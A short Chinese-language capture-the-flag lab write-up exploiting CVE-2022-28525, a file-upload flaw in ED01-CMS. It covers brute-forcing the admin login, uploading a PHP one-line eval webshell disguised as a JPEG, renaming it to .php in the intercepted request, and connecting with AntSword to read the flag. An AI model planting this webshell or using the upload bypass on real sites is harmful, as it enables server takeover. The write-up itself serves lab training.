春秋云境 | 文件上传 | CVE-2022-28525

目录

靶标介绍

开启靶场

蚁剑连接

[获取 flag](#获取 flag)


靶标介绍

ED01-CMS v20180505 存在任意文件上传漏洞

开启靶场

发现了一个登录功能,使用 burp 爆破一下

爆破之后得到账号是 admin 密码是 admin,登录后是这样的页面

在左边的菜单栏挨着一个一个找,发现这个地方可以编辑用户的信息,可以修改头像上传头像

构造一个一句话木马,重命名为 1.jpg

1.jpg:
<?php @eval($_POST[cmd]);?>

勾选 new image,上传 1.jpg, 然后抓包,修改后缀为 php,然后放包

放包之后,发现上传成功,右击复制图片链接

蚁剑连接

在根目录发现了 flag

获取 flag

相关推荐
WTT00112 小时前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
群联云防护小杜5 小时前
如何给负载均衡平台做好安全防御
运维·服务器·网络·网络协议·安全·负载均衡
ihengshuai5 小时前
HTTP协议及安全防范
网络协议·安全·http
蜜獾云5 小时前
linux firewalld 命令详解
linux·运维·服务器·网络·windows·网络安全·firewalld
黑客Jack6 小时前
防御 XSS 的七条原则
安全·web安全·xss
东方隐侠安全团队-千里6 小时前
网安瞭望台第17期:Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析
网络·chrome·web安全
云云3216 小时前
怎么通过亚矩阵云手机实现营销?
大数据·服务器·安全·智能手机·矩阵
神一样的老师7 小时前
面向高精度网络的时间同步安全管理架构
网络·安全·架构
Mitch3118 小时前
【漏洞复现】CVE-2021-45788 SQL Injection
sql·web安全·docker·prometheus·metersphere
网络安全King8 小时前
网络安全 - SQL Injection
sql·web安全·php